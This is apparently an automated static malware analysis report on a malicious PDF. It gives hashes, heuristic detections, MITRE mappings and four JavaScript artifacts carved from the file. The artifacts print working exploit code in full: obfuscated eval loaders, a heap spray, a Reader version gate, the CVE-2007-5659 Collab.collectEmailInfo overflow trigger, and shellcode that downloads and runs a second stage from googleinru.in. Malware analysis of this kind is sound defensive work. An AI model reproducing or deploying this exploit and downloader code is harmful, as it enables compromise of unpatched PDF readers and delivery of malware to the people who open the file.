Malicious PDF — malware analysis report

Static analysis result for SHA-256 20dc4cd6fbadc90b…

MALICIOUS

PDF

8.3 KB First seen: 2026-05-08
MD5: 8b62408b26203f75d63eb90cadea9b85 SHA-1: 115ebb120a62662706fce3333b6189e2a6462814 SHA-256: 20dc4cd6fbadc90bd6374f9192ee2595dbff72e7721fb34869b933bd3e38b7aa
266 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 JavaScript/Script Execution T1204.002 Malicious File Execution: Malicious JavaScript

The PDF file contains embedded JavaScript, indicated by multiple heuristic firings related to PDF JavaScript actions and streams. The deobfuscated JavaScript files suggest an attempt to execute malicious code. The 'syncAnnotScan' primitive is used to decode and evaluate JavaScript, which is a common technique for exploiting PDF vulnerabilities. The presence of obfuscated script indicators further supports a malicious intent, likely to download and execute a second-stage payload.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 9

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action low 4 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) high CVE likely PDF_JS_ADOBE_APSB08_13_PATCH_GATE
    PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
    Matched line in script
    var df____FD = new Array();var W__CE7n5 = 0;var w7_m_s_M262F = "";function P4_rtbG(U0NJBw_yN_A_24, FWXFS5Tl7_AGLi){var U_VotY_65i = FWXFS5Tl7_AGLi.toString();var O6_f2k6_l = "";for(var t1_0Xuy = 0; t1_0Xuy < U_VotY_65i.length; t1_0Xuy++) {var L__i_tf77r354 = parseInt(U_VotY_65i.substr(t1_0Xuy, 1));if (!isNaN(L__i_tf77r354)) {L__i_tf77r354 = L__i_tf77r354.toString(16);if (L__i_tf77r354.length == 1) { L__i_tf77r354 = "0" + L__i_tf77r354; }else if (L__i_tf77r354.length != 2) { L__i_tf77r354 = "00"; …
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
            for (var i=0; i < list.length; i++) {
            result +=  String.fromCharCode(list[i] - jump);
        }
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • syncAnnotScan annotation-staging primitive low PDF_FOXIT_SYNCANNOTSCAN
    PDF JavaScript calls syncAnnotScan() — a no-op annotation-enumeration primitive used by exploit-kit JavaScript to stage payload reads from annotation /Subject fields before eval(). Not a vulnerable sink itself; rarely seen in legitimate PDFs. (identified after JavaScript deobfuscation)
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://googleinru.in/cgi-bin/etn/z005106201r0019R84aff6eaXd89f4463Y698970d2Z01001f50 Referenced by PDF JavaScript

Extracted artifacts 4

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0004_000.js pdf-javascript-stream PDF /JS object 4 at offset 0xE1 1940 bytes
SHA-256: be4694a17eb89a55f7eb3db389ba2bc4f102f4c7dcfc99549d848cdb7df5dfb5
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
sourceCode = "118,97,114,32,112,114,32,61,32,110,117,108,108,59,13,10,118,97,114,32,102,110,99,32,61,32,39,101,118,39,59,13,10,118,97,114,32,115,117,109,32,61,32,39,39,59,13,10,13,10,97,112,112,46,100,111,99,46,115,121,110,99,65,110,110,111,116,83,99,97,110,40,41,59,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,33,61,32,48,41,32,123,13,10,9,118,97,114,32,110,117,109,32,61,32,49,59,13,10,13,10,9,112,114,32,61,32,97,112,112,46,100,111,99,46,103,101,116,65,110,110,111,116,115,40,13,10,9,9,123,13,10,9,9,9,110,80,97,103,101,58,32,48,13,10,9,9,125,13,10,9,41,59,13,10,13,10,9,115,117,109,32,61,32,112,114,91,110,117,109,93,46,115,117,98,106,101,99,116,59,13,10,125,13,10,13,10,118,97,114,32,98,117,102,32,61,32,34,34,59,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,62,32,51,41,32,123,13,10,9,102,110,99,32,43,61,32,39,97,39,59,13,10,9,118,97,114,32,97,114,114,32,61,32,115,117,109,46,115,112,108,105,116,40,47,45,47,41,59,10,9,118,97,114,32,112,114,111,99,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,50,50,43,49,53,41,59,10,9,13,10,9,102,111,114,32,40,118,97,114,32,105,32,61,32,49,59,32,105,32,60,32,97,114,114,46,108,101,110,103,116,104,59,32,105,43,43,41,32,123,13,10,9,9,98,117,102,32,43,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,34,48,120,34,43,97,114,114,91,105,93,41,59,13,10,9,125,13,10,125,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,62,61,32,50,41,32,123,13,10,9,102,110,99,32,43,61,32,39,108,39,59,13,10,9,97,112,112,91,102,110,99,93,40,98,117,102,41,59,13,10,125,13,10"; 
function decrypt(str, jump){
var result = "";
var list = str.split(',');
        for (var i=0; i < list.length; i++) {
            result +=  String.fromCharCode(list[i] - jump);
        }
        return result;
        }
numeric_charcode_stage_000.js deobfuscated-js numeric char-code string decoded JavaScript at offset 0xEF 505 bytes
SHA-256: 6c41320119e160dc719997b9a2efb3600ea9d7e9d7e44b4dc2125762dc9f365f
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var pr = null;
var fnc = 'ev';
var sum = '';

app.doc.syncAnnotScan();

if (app.plugIns.length != 0) {
	var num = 1;

	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	var arr = sum.split(/-/);
	var proc = String.fromCharCode(22+15);
	
	for (var i = 1; i < arr.length; i++) {
		buf += String.fromCharCode("0x"+arr[i]);
	}
}

if (app.plugIns.length >= 2) {
	fnc += 'l';
	app[fnc](buf);
}
legacy_pdfkit_stage_000.js deobfuscated-js repeated-marker hex decoded JavaScript at offset 0x1BAD 1739 bytes
SHA-256: 18be611ac4960b30990ca89e798ccca2741995b39e35e5919afacdcafa28f384
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function R8K_BAi_37v2Ix(MXn_ok, YFO____LnG_0u){var c_C_h_4_5Ub = 4;var gJ452QRfQ_Dya = new Array();var v6U_2_E2l = new Array(107,256,11,  512, 106, 11,  44,40, 33);v6U_2_E2l[5] += 12;var Rh4_y4l = "";try {var w_s8__33N6v2O = 0;if (app) {YFO____LnG_0u = pr[w_s8__33N6v2O].subject;}} catch(e) {}if (!MXn_ok) { gJ452QRfQ_Dya[0] = 0;gJ452QRfQ_Dya[1] = gJ452QRfQ_Dya[0];gJ452QRfQ_Dya[2] = gJ452QRfQ_Dya[1];gJ452QRfQ_Dya[3] = gJ452QRfQ_Dya[2];var kmR1Fd1_M5____a = v6U_2_E2l[6] + 3;var gpDNHo_HgV_a_x = kmR1Fd1_M5____a + 11;var PnXaH_gm4_A1j = R8K_BAi_37v2Ix;var v31_v8nP78fa8 = 0;PnXaH_gm4_A1j = PnXaH_gm4_A1j.toString();for(var fkf_2__U30U6 = 0; fkf_2__U30U6 < PnXaH_gm4_A1j.length; fkf_2__U30U6++) {var Mn84Be = PnXaH_gm4_A1j.charCodeAt(fkf_2__U30U6);if (Mn84Be > kmR1Fd1_M5____a && Mn84Be < gpDNHo_HgV_a_x) {if (v31_v8nP78fa8 == 4) {v31_v8nP78fa8 = 0;}gJ452QRfQ_Dya[v31_v8nP78fa8] += Mn84Be;if (gJ452QRfQ_Dya[v31_v8nP78fa8] > v6U_2_E2l[3]) {gJ452QRfQ_Dya[v31_v8nP78fa8] -= 512;}v31_v8nP78fa8++;}}}else  { gJ452QRfQ_Dya = MXn_ok;}for (var IR3Q0_uY = 0; IR3Q0_uY < 4; IR3Q0_uY++) {if (gJ452QRfQ_Dya[IR3Q0_uY] > v6U_2_E2l[1]) {gJ452QRfQ_Dya[IR3Q0_uY] -= v6U_2_E2l[1];}}var wP___x = 0;var S_CSN0Aj = 0;var O1_E__65vVj5;var yDc6_xhp = 0;while ( wP___x < YFO____LnG_0u.length ) {var H__NQN71n__W = "";H__NQN71n__W = YFO____LnG_0u.substr(wP___x, 2);var kxj3_6X_s = parseInt(H__NQN71n__W, v6U_2_E2l[5]); if (S_CSN0Aj == 4) {S_CSN0Aj = 0;}kxj3_6X_s -= (yDc6_xhp + 2) * gJ452QRfQ_Dya[S_CSN0Aj];if (kxj3_6X_s < 0) {kxj3_6X_s -= Math.floor(kxj3_6X_s / v6U_2_E2l[1]) * v6U_2_E2l[1];}Rh4_y4l += String.fromCharCode(kxj3_6X_s);{wP___x += 2;yDc6_xhp++;S_CSN0Aj++;}}var kXW_nx21c = this;kXW_nx21c["eval"](Rh4_y4l);return 0;}

	R8K_BAi_37v2Ix(0);
legacy_pdfkit_stage_001.js deobfuscated-js annotation-subject callee-key decoded JavaScript at offset 0x4C3 4887 bytes
SHA-256: 4795547a1885feb2ae7163a604186f68f98cc2519ad5fb47c185d233488665fb
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var df____FD = new Array();var W__CE7n5 = 0;var w7_m_s_M262F = "";function P4_rtbG(U0NJBw_yN_A_24, FWXFS5Tl7_AGLi){var U_VotY_65i = FWXFS5Tl7_AGLi.toString();var O6_f2k6_l = "";for(var t1_0Xuy = 0; t1_0Xuy < U_VotY_65i.length; t1_0Xuy++) {var L__i_tf77r354 = parseInt(U_VotY_65i.substr(t1_0Xuy, 1));if (!isNaN(L__i_tf77r354)) {L__i_tf77r354 = L__i_tf77r354.toString(16);if (L__i_tf77r354.length == 1) { L__i_tf77r354 = "0" + L__i_tf77r354; }else if (L__i_tf77r354.length != 2) { L__i_tf77r354 = "00"; }O6_f2k6_l = L__i_tf77r354 + O6_f2k6_l;}}while(O6_f2k6_l.length < 8) { O6_f2k6_l = "0" + O6_f2k6_l; }var JbD5ox = U0NJBw_yN_A_24.toString(16);if (JbD5ox.length == 1) { JbD5ox = "0" + JbD5ox; }else if (JbD5ox.length != 2) { JbD5ox = "00"; }O6_f2k6_l = "3" + JbD5ox + "P" + O6_f2k6_l;return O6_f2k6_l;}function rUaE5_3_X__t(i_httdr36c3Msc, nU3vmb){var cm3h__v = new Array("");var s_ERcp = i_httdr36c3Msc;var r__52n;if ((r__52n = i_httdr36c3Msc.lastIndexOf("%u00")) != -1) {if (r__52n + 6 == i_httdr36c3Msc.length) {cm3h__v[0] = i_httdr36c3Msc.substr(r__52n + 4, 2);s_ERcp = i_httdr36c3Msc.substring(0, r__52n);}}r__52n = 1;for (t1_0Xuy = 0; t1_0Xuy < nU3vmb.length; t1_0Xuy++) {var Js87JC0_UBkd_16 = nU3vmb.charCodeAt(t1_0Xuy).toString(16);if (Js87JC0_UBkd_16.length == 1) { Js87JC0_UBkd_16 = "0" + Js87JC0_UBkd_16; }cm3h__v[r__52n] = Js87JC0_UBkd_16;r__52n++;}t1_0Xuy = cm3h__v[0].length ? 0 : 1;cm3h__v[r__52n] = "00";cm3h__v[r__52n + 1] = "00";r__52n += 2;if ((cm3h__v.length - t1_0Xuy) % 2) {cm3h__v[r__52n] = "00";}while(t1_0Xuy < cm3h__v.length) {s_ERcp += "%u" + cm3h__v[t1_0Xuy + 1] + cm3h__v[t1_0Xuy];t1_0Xuy += 2;}s_ERcp += "%u0000";return s_ERcp;}function K_t_C3(pKo3deE7_qkEa, xjhf_v_nhF8a_d){while (pKo3deE7_qkEa.length*2<xjhf_v_nhF8a_d) {pKo3deE7_qkEa += pKo3deE7_qkEa;}pKo3deE7_qkEa = pKo3deE7_qkEa.substring(0,xjhf_v_nhF8a_d/2);return pKo3deE7_qkEa;}function kfP___EA_P8qAhi(OE52_2I, l_7b_Ei1CCB_fIm, S_sRn__5jX){var aK7wU_hu276 = 0x0c0c0c0c;var pKo3deE7_qkEa = unescape(l_7b_Ei1CCB_fIm);var nU3vmb = P4_rtbG(OE52_2I, S_sRn__5jX);var i_q__r38c__X024 = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var i_httdr36c3Msc = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%u9090%u00e8%u0000%ueb00%ue900%u00fc%u0000%u645f%u30a1%u0000%u7800%u8b0c%u0c40%u708b%uad1c%u688b%ueb08%u8b09%u3440%u408d%u8b7c%u3c68%uf78b%u046a%ue859%u008f%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0079%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u04ec%u0001%u8b00%u51dc%u5352%u0468%u0001%uff00%u0c56%u595a%u5251%u028b%u4353%u3b80%u7500%u81fa%ufc7b%u652e%u6578%u0375%ueb83%u8908%uc703%u0443%u652e%u6578%u43c6%u0008%u8a5b%u04c1%u8830%u0045%uc033%u5050%u5753%uff50%u1056%uf883%u7500%u6a06%u5301%u56ff%u5a04%u8359%u04c2%u8041%u003a%ub475%u56ff%u5108%u8b56%u3c75%u748b%u782e%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%ud63a%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%uffe8%ufffe%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u7770%u4455%u006c%u7468%u7074%u2f3a%u672f%u6f6f%u6c67%u6965%u726e%u2e75%u6e69%u632f%u6967%u622d%u6e69%u652f%u6e74%u7a2f%u3030%u3135%u3630%u3032%u7231%u3030%u3931%u3852%u6134%u6666%u6536%u5861%u3864%u6639%u3434%u3336%u3659%u3839%u3739%u6430%u5a32%u3130%u3030%u6631%u3035";app.l8k141y87m = unescape(rUaE5_3_X__t(i_httdr36c3Msc, nU3vmb));var ID_e_71_b_w2 = 0x400000;var a_5QdK__XtG_i_w = i_q__r38c__X024.length * 2;var xjhf_v_nhF8a_d = ID_e_71_b_w2 - (a_5QdK__XtG_i_w+0x38);pKo3deE7_qkEa = K_t_C3(pKo3deE7_qkEa, xjhf_v_nhF8a_d);var Xa1_ddSl = (aK7wU_hu276 - 0x400000)/ID_e_71_b_w2;for (var liC7cA2m8h44tUH = 0; liC7cA2m8h44tUH < Xa1_ddSl; liC7cA2m8h44tUH++) {df____FD[liC7cA2m8h44tUH] = pKo3deE7_qkEa + i_q__r38c__X024;}}function Sp3H_OG04f(){var b_g8bC_s = "";for (t1_0Xuy = 0; t1_0Xuy < 12; t1_0Xuy++) {b_g8bC_s += unescape("%u0c0c%u0c0c");}var HCxbGm_831_52h = "";for (t1_0Xuy = 0; t1_0Xuy < 750; t1_0Xuy++) {HCxbGm_831_52h += b_g8bC_s;}this.collabStore = Collab.collectEmailInfo({subj: "", msg: HCxbGm_831_52h});app.clearTimeOut(W__CE7n5);}function QBKG2u(c__l_3u){var Wt_Q_o__I__aek = W__CE7n5;if ((c__l_3u >= 8 && c__l_3u < 8.11) || c__l_3u < 7.1) {kfP___EA_P8qAhi(23, "%u0c0c%u0c0c", c__l_3u);Sp3H_OG04f();}if (Wt_Q_o__I__aek) {app.clearTimeOut(Wt_Q_o__I__aek);}}var S_sRn__5jX = 0;var Kjn8OLI_68MRV = app.plugIns;for (var qL_t___58 = 0; qL_t___58 < Kjn8OLI_68MRV.length; qL_t___58++) {var y25J5oR_q = Kjn8OLI_68MRV[qL_t___58].version;if (y25J5oR_q > S_sRn__5jX) { S_sRn__5jX = y25J5oR_q; }}if (app.viewerVersion == 9.103 && S_sRn__5jX < 9.13) {S_sRn__5jX = 9.13;}app.Y_5FtJ = QBKG2u;W__CE7n5 = app.setTimeOut("app.Y_5FtJ(" + S_sRn__5jX.toString() + ")", 50);

Open this report in the interactive analyzer, or submit your own file for analysis.